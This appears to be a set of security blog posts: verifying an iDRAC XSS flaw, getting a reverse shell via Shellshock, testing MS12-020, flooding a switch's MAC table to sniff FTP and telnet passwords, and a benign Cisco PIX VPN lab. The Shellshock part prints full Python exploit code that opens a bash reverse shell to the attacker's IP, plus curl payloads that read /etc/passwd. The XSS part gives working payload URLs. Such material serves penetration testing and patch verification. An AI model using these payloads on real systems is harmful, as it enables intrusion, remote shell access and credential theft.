How to verify CVE-2013-3589 (Dell iDRAC 6 and iDRAC 7 XSS Vulnerability)

1.   Nessus description:

The remote Dell Remote Access Controller (iDRAC6 / iDRAC7) is affected by a cross-site scripting vulnerability. The login page does not properly sanitize user-supplied input to the 'ErrorMsg' parameter. An attacker could leverage this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.

2.   Demonstration:

1) Actually the login page does filter some Java scripts, so if you use the common script like <script>alert(1)</script>, it won’t work.
2) Example 1: pop up a javascript window.
https://192.168.xxx.xxx/login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E





3) Example 2: redirect to https://google.com

https://192.168.xxx.xxx/login.html?ErrorMsg="><img src=x onerror=window.open('https://google.com/');>

3.   Recommendation

1) Upgrade to firmware version 1.96 (iDRAC6) / 1.46.45 (iDRAC7) or later.

4.   References:

1). http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3589
2). http://www.tenable.com/plugins/index.php?view=single&id=70411

How to get reverse shell with BASH (shellshock) vulnerability?

Pre-require:

1. Kali Linux

2.  Download the python code from http://pastebin.com/166f8Rjx and save as “shellshock.py”

3. If you are trying to attack an https site, change line 12 to conn = httplib.HTTPSConnection(sys.argv[1]), here I save it as “shellshocks.py”

4. Your Kali Linux IP

5. The vulnerable host IP

Steps

1. Run command “nc –lvp 9999”, listening on port 9999, you can change the port number if you want.

  

2. Open another window and run command “python shellshocks.py 10.10.x.x /ucsm/isSamInstalled.cgi 172.16.x.x/9999”. 10.10.x.x is the vulnerable host. 172.16.x.x is my Kali Linux IP.

3. Now you can get the shell:

Some commands that can be used to verify Shellshock:

1. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" https://10.10.x.x/ucsm/isSamInstalled.cgi

2. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/cat /etc/passwd" https://10.10.x.x/ucsm/isSamInstalled.cgi

3. curl --insecure -A "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit" https://10.10.x.x/ucsm/isSamInstalled.cgi

Appendix: the source code (from http://pastebin.com/166f8Rjx)
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4 br="">    print "Usage: %s " % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

MS12-020 denial of service code test

The RDP Vulnerability attack code has been spread like a wild fire.  I just tested the code yesterday, it works really well even cross the Internet. I recorded the whole process. You can see how easy it is. Currently the code can only cause blue screen, but it might change to remote code execution soon. The clock is ticking. Install the patch in your computers. You can download the code from http://aluigi.org/adv/termdd_1-adv.txt

To check if the patches are already applied, use these 2 commands:

wmic qfe | find "KB2667402"

wmic qfe | find "KB2621440"

For more information: http://isc.sans.edu/diary.html?storyid=12808&rss and http://isc.sans.edu/diary.html?storyid=12805&rss

Flood the MAC address table of a Switch

Lab Section: Switch

Lab Title: Flood the MAC address table of a Switch

Objective

In this lab exercise, we will complete the following tasks:

1. Use Ettercap to overflow the MAC address table of a Cisco switch 2950.

2. Use Wireshark to sniff the FTP password.

Background

Switches maintain a table of MAC addresses and associated switch port. When a switch receives a frame, the destination MAC address is checked against the table, and the corresponding port is used to route the frame out of the switch. If a switch does not know which port to route the frame, or the frame is a broadcast, then the frame is routed out all ports except the port where it originated.

Scenario

Your computer is connected to an uncontrolled switch. You want to sniff the traffic of the other computers that are connected with this switch. Because switch has a MAC address table to match the destination, you have to flood this table to force the switch broadcast every frame and work like a Hub.

Topology

This figure illustrates the lab network environment:

Preparation

Tools and Resources

In order to complete the lab, the following is required:

1. Ettercap0.7.3: http://sourceforge.net/projects/ettercap/

2. WireShark 1.05: http://www.wireshark.org/

3. Putty or HyperTerminal

Additional Materials

Visit the following website for more information on the objectives covered in this lab:

1. http://en.wikipedia.org/wiki/ARP_poisoning

2. http://en.wikipedia.org/wiki/Ettercap_(computing)

Procedure

1. Preparation: To start the FTP server and Telnet Server in Windows 2003 server and check the connection between these PCs.

1.1 In Server 192.168.10.9, open a command line window.

1.2 Enter “ipconfig /all” to show the current network setting, make sure the IP address is correct.

1.3 Enter “ping 192.168.10.10”, check the connection of other computer.

1.4 Enter “ping 192.168.10.11”, check the connection of other computer. Make sure they are all connected.

1.5 Open “Control Panel”-> “Administrative tools”-> “Services”, find out the Telnet service and start it.

1.6 Back to the “Administrative Tools”, open “Computer Management”, click “Local Users and Groups”.

1.7 Enter the “User” window, add 2 new users, one is “telnetuser”, another is “ftpuser”, you need to setup password, and uncheck the “user must change password at next logon” option (just for convenience, you’d better not uncheck this option in the reality environment).

1.8 Setup user “telnetuser” as one of the members of “TelnetClients” Group.

1.9 Return to “Administrative Tools” window. Run “Internet Information Services(IIS) Manager” to setup FTP server.

1.10 Right click “Default FTP Site”, choose “Properties”, uncheck “Allow anonymous connections”, apply for the change.

1.11 In Sniffer PC, open a command line window.

1.12 Enter “ipconfig /all” to show the current network setting, make sure the IP address is correct.

1.13 Run Wireshark, click Menu “Capture”-> “Interface”. Click “option” to open the capture options windows.

1.14 Setup the Capture Filter, we use “IP only” here. Click “Start”.

1.15 Wireshark start to capture packets, as you can see. Only the broadcast and the local packets can be received.

1.16 In User PC, open a command line window.

1.17 Enter “ipconfig /all” to show the current network setting, make sure the IP address is correct.

1.18 Ping 192.168.10.10, Wireshark will capture the ICMP traffic because Wireshark is running in 192.168.10.10.

1.19 Telnet 192.168.10.9, Wireshark won’t get any packets because the switch forwarded the packets to 192.168.10.9 directly.

1.20 Connect the switch to the User PC with console cable.

1.21 Run Putty and open the terminal window.

Swithch>Enable

Swithch>Show mac-address-table dynamic

Ok, the test environment is settled.

Click here to watch the video1: Preparation (http://www.valit.ca/lab/lab7/lab7_1.html)

2. Flood MAC-address table.

2.1 In Sniffer PC: let’s use another capture filter in Wireshark, because we only care the traffic of the server

2.2 In Wireshark, click menu “capture”->”Interface”, click “options”, then click “capture filter”, and choose “IP address 192.168.10.9”, you may change the IP address. Click “ok” and “Start”.

2.3 Run ettercap. Click menu “Sniff”-> “Unified sniffing”, select the network interface, click “OK”.

2.4 Click menu “Plugins”-> “Manager the Plugins”, select “rand_flood”. Click menu “Start”-> “Start sniffing”.

2.5 In User PC: Inside the Putty window, enter “Show mac-address-table dynamic”, we’ll be able to see a lot of fate mac address.

2.6 Open a command line window, enter “telnet 192.168.10.9”, enter username and password, connect to the telnet server.

2.7 In Sniffer PC (192.168.10.10): we’ll be able to see the telnet traffic between 192.168.10.9(server) and 192.168.10.11(user), because the mac-address table is full, the switch has to broadcast the packets.

2.8 In User PC: Open IE Browser, enter Ftp://192.168.10.9, enter username and password. Connect to the FTP server.

2.9 In Sniffer PC (192.168.10.10): we’ll be able to see the FTP traffic between 192.168.10.9(server) and 192.168.10.11(user).

2.10 Ettercap also can sniff the telnet and ftp password, but if you want to capture and analyst other traffics, Wireshark is the better choise.

Click here to watch the video2: overflow (http://www.valit.ca/lab/lab7/lab7_2.html)

PIX802, ASDM603 Configure Remote access VPN

Purpose:

1. Use GNS3 to simulate a Remote access VPN environment.

2. Practice to install ASDM 603 in PIX version 802

3. Install ASDM client and configure Remote access VPN.

4. Use Cisco VPN client to connect to inside network.

Tools:

1. Dynamips 0.2.8, http://www.ipflow.utc.fr/blog/

2. GNS3 V0.6, http://www.gns3.net/

3. Virtual PC Simulator 01.6a: http://wiki.freecode.com.cn/doku.php?id=wiki:vpcs

4. PuTTY 0.6: http://www.chiark.greenend.org.uk/~sgtatham/putty/

5. Battle Encoder Shirase (BES1.3.8): http://mion.faireal.net/BES/

6. PIX802.bin and ASDM603.bin.

7. Java 6 update 7 (Don’t use Java 6 update 10 or 11, it is incompatible with ASDM603. If you intent to use these versions, you have to chose higher ASDM version. Please refer to my Blog: http://jhuang8.blogspot.com/2009/01/cisco-asdm-unconnected-sockets-not.html)

Topological:

Requires:

1. Outside PCs use Cisco VPN client to connect to the Inside network.

2. Outside PCs IP range: 76.77.0.0/16.

3. Inside PCs IP range: 10.10.10.0/24

4. VPN IP Pool: 10.10.10.100 --- 10.10.10.200

5. Dns server is 208.67.222.222

6. The ranger of IP that can be distributed is 172.20.0.0/16

7. Outside network connect to e0 port of PIX firewall, Inside network connect to e1 interface. (Normally, e0 is for Outside, e1 is for Inside, and e2 is used for DMZ.)

8. We are going to use the real Pc to simulate the Outside PC, and use “Virtual PC Simulator” to simulate the Inside PC.

Procedure:

1. Install Microsoft Loopback virtual networking card. In order to install ASDM client and VPN client, we have to connect GNS3 to a real PC. It is good to install a virtual networking interface for this purpose, with this way, we don’t need to change the configuration of the real networking card which could cause some networking connection problems.

1.1 Open “control panel”-> “Add Hardware”

1.2 Follow the “Add Hardware Wizard”.

1.3 Select “Yes, I have already connected the hardware” in “Is the hardware connected” window.

1.4 In “hardware list” window, click “Add a new hardware device” on the bottom of the list.

1.5 Select “install the hardware that I manually select from a list”.

1.6 Select “ Network adapters”

1.7 Select “Microsoft Loopback Adapter”.

1.8 After some files are copied, we’ve done the installation.

1.9 Open “Network connections” window.

1.10 Change the Adapter name to “MS Loopback”

Click here to watch the video 1: Install MS Loopback adapter

2. If this is the first time that you are running GNS3, you need to do some settings:

2.1 GNS3 will open a “Setup wizard” window to guide you through the settings. Click the big “1” button, or you can click the menu “Edit”-> “Preferences” to open the same window.

2.2 In “General” window, Setup the “Terminal command”, Project directory and IOS/PIX directory.

2.3 In “Dynamips” window, setup the “working directory”, then click “test” button to check if Dynamips works.

2.4 In “Pemu” window, setup the “working directory”, the pix image location, key and serial number.

2.5 Click the big “2” button to setup the IOS images, or you can click the menu “Edit” -> “IOS images and hypervisors” to open the same window.

2.6 Setup the image file, platform, model, default RAM for each router. You can check the default RAM value from Cisco website.

2.7 Setup the router Idle value to reduce the CPU usage. Draw the router icon to the topologic panel

2.8 Right click the icon, click “start” to start the router.

2.9 Right click the icon again, and click “console”, a Putty window will open up.

2.10 Press enter until the “>” prompt appears, if there is a question:” Would you like to enter the initial configuration dialog?” answer “no”.

2.11 Right click the icon again and click “Idle PC”, and select an idle pc value from the pop up window, choose one of the values with an asterisk.

2.12 Calculate other routers’ Idle PC value.

Click here to watch the video 2: Configure GNS3

3. Create the topological graph in GNS3. In order to draw this topological graph, we need to add 3 symbols.

3.1 Run virtual PC simulator. Double click “vpcs.exe”, it will open a command line window. Wait until the “VPSC 1>” prompt appears. It is better to run vpcs before running GNS3.

3.2 Run GNS3, click the menu “Edit”-> “Symbol Manager”, add 3 symbols:

Symbol	Name	Type
Computer	Computer	Cloud
Cloud	Internet	Ethernet switch
Server	Server	cloud

Click “ok” to exit “Symbol Manager”

3.3 Draw the Icons to topological panel, put notes for every icon (refer to the topologic graph).

3.4 Setup “OutsidePC” using MS loopback adapter.

3.5 Setup “InsidePC” using vpc

3.6 Connect the equipments, remember in PIX, e0 is usually for outside network, e1 for inside network.

3.7 Add notes for the connection.

3.8 Save the topologic design.

Click here to watch the video 3: Create topological graph.

4. Configure the outside and inside network:

4.1 Run “Windows Task Manager” to monitor the CPU usage.

4.2 Run BES1.3.8

4.3 Right click the Firewall Icon “FW0”, choose “start”.

4.4 Right click Icon “FW0” again, and choose “console”, a Putty window pops up.

4.5 Wait until the firewall initializing finished, the “>” prompt appears.

4.6 The CPU usage rise to 100%, we need to limit it. Open BES window, click “Target” button, choose “pemu.exe” process, click “Limit/Watch”, click “Yes” to confirm. Click “Control” button, choose a percentage. For this example, I choose -50%

4.7 Back to Putty window.

4.8 Enter commands in PIX CLI:

pixfirewall> en

Password:

pixfirewall# show version

4.9 Check the “show version” output, if the VPN-DES and VPN-3DES-AES” are disabled, “ac ” command should be run to activate this function. And because GNS3 doesn’t support “reload” command, we have to right click the FW0 icon, choose “stop” to turn off the firewall, and then right click it again, choose “start” to boot up the firewall.

4.10 Use “show version” command again, now the VPN-DES feature should be enabled.

4.11 Configure outside connection IP address and network zone.

pixfirewall# show ip address

pixfirewall# show interface ip brief

pixfirewall# conf t

pixfirewall(config)# interface e0

pixfirewall(config-if)# ip address 76.77.78.1 255.255.0.0

pixfirewall(config-if)# nameif outside

pixfirewall(config-if)# security-level 0

pixfirewall(config-if)# speed 100

pixfirewall(config-if)# duplex full

pixfirewall(config-if)# no shut

pixfirewall(config-if)# show run

4.12 Minimize the GNS3 window. Open the “Network Connections” window, Right click the MS Loopback Adapter Icon, click “Properties” to open the Adapter’s properties window; In “General” tab, select “Internet Protocol(TCP/IP), click “Properties” button. Change the IP settings: IP address: 76.77.78.79, Subnet mask: 255.255.0.0, Default gateway: 76.77.78.1. Click “ok” to exit the setting.

4.13 Click “Start” -> “Run”-> “cmd”, open a command line windows,

> ipconfig ;Verify the MS Loopback adapter IP address

> ping 76.77.78.1 ; Check the connection between the outside pc and firewall.

4.14 Return to GNS3, Putty window:

pixfirewall(config-if)# ping 76.77.78.79

;Check the connection between the outside pc and firewall.

pixfirewall(config-if)# exit

4.15 Configure the inside zone:

pixfirewall(config)# interface e1

pixfirewall(config-if)# nameif inside

pixfirewall(config-if)# security-level 100

pixfirewall(config-if)# speed 100

pixfirewall(config-if)# duplex full

pixfirewall(config-if)# no shut

pixfirewall(config-if)# ip address 10.10.10.1 255.255.255.0

pixfirewall(config-if)# show ip address

pixfirewall(config-if)# show interface ip brief

4.16 Minimize the GNS3 window, active the vpcs window,

VPCS 1>show ip address

VPCS 1> ip 10.10.10.11 10.10.10.1 24

VPCS 1> ping 10.10.10.1 ; Check the connection between the inside pc and firewall.

4.17 Return to GNS3, Putty window:

pixfirewall(config-if)# ping 10.0.1.11 ; Check the connection between the inside pc and firewall.

pixfirewall(config-if)# wr ;Save the configuration

Click here to watch the video 4: Configure ip address and network zone.

5. Upload ASDM803.bin to flash.

5.1 pixfirewall(config-if)# end

pixfirewall# show flash

If you couldn’t find “asdm-603.bin” in the flash files list, you need to upload the file from tftp server

5.2 Run SolarWinds TFTP Server, click the menu “File”-> “Configure”. In “General” tab, select the bin file directory in “Storage” section. Click “Security” tab, make sure “Send and Receive files” option is selected. Back to “General” tab, Click “Start”.

5.3 Back to Putty window.

pixfirewall# copy tftp://76.77.78.79/asdm-603.bin flash:

pixfirewall# show flash ;Check if the bin file has already been uploaded

5.4 Enable the http server

pixfirewall# conf t

pixfirewall(config)# http server enable

pixfirewall(config)# http 10.10.10.0 255.255.255.0 inside

pixfirewall(config)# http 76.77.0.0 255.255.0.0 outside

pixfirewall(config)# asdm image flash:asdm-603.bin

pixfirewall(config)# asdm history enable

pixfirewall(config)# username cisco password test1234 privilege 15

pixfirewall(config)# ping 76.77.78.79

pixfirewall(config)# end

pixfirewall# wr

Click here to watch the video: 5. Upload ASDM803.bin to flash

6. Install ASDM.

6.1 pixfirewall# show run ;Double check the settings

6.2 Run IE browser, enter the address: https://76.77.78.1

6.3 Click “Continue to this website”

6.4 Click “Install ASDM Launcher and Run ASDM

6.5 Enter username and password

6.6 Click “Run” button to install ASDM

6.7 When the ASDM Launcher window pops up, enter the ip address, username and password.

6.8 If there is a warning message: “The web site’s certificate cannot be verified. Do you want to continue?” Choose “Always trust content from this publisher.” Click “Yes” to continue.

6.9 Now you will be able to see the main window of ASDM

Click here to watch the video 6: Install ASDM

7. Use “IPsec VPN Wizard” to setup Remote access VPN

7.1 Click the menu “Wizards”-> “IPsec VPN Wizard”

7.2 Choose “Remote Access”.

7.3 Choose “Cisco VPN Client”

7.4 Enter the Pre-Shared Key and Group name

7.5 Choose “Authenticate using the local user database”

7.6 Add some username and password

7.7 Create IP Pool: start from 10.10.10.100, end with 10.10.10.200, subnet mask is 255.255.255.0

7.8 Enter default Domain name (optional)

7.9 Choose 3des and SHA as the encryption and authentication algorithm

7.10 NAT setting

7.11 Click “finish” button, return to main window

7.12 Click “save” button to save the current configuration

Click here to watch the video 7: IPsec VPN Wizard

8. Connect VPN with Cisco VPN Client

8.1 Run Cisco VPN Client.

8.2 Click “New” button to define a new VPN connection

8.3 Enter the host ip, group name, password etc.

8.4 Click “save” button.

8.5 Double click the VPN connection that you just defined

8.6 Enter username and password

8.7 In ASDM window, you could see that there is one VPN connection.

8.8 Right click the VPN icon that located on the system tray (the right down side of the screen), choose “Statistics”, you’ll be able to see the Tunnel Details and Route Details.

8.9 Open a command line window, enter “ipconfig” to check the ip address. You’ll be able to see the ip address of the VPN adapter is 10.10.10.100.

Click here to watch the video 8: Cisco VPN Client

Congratulations! You’ve done everything!

= = = = ================================================================

Video List:

1. Click here to watch the video 1: Install MS Loopback adapter

2. Click here to watch the video 2: Configure GNS3

3. Click here to watch the video 3: Create topological graph.

4. Click here to watch the video 4: Configure ip address and network zone.

5. Click here to watch the video: 5. Upload ASDM803.bin to flash

6. Click here to watch the video 6: Install ASDM

7. Click here to watch the video 7: IPsec VPN Wizard

8. Click here to watch the video 8: Cisco VPN Client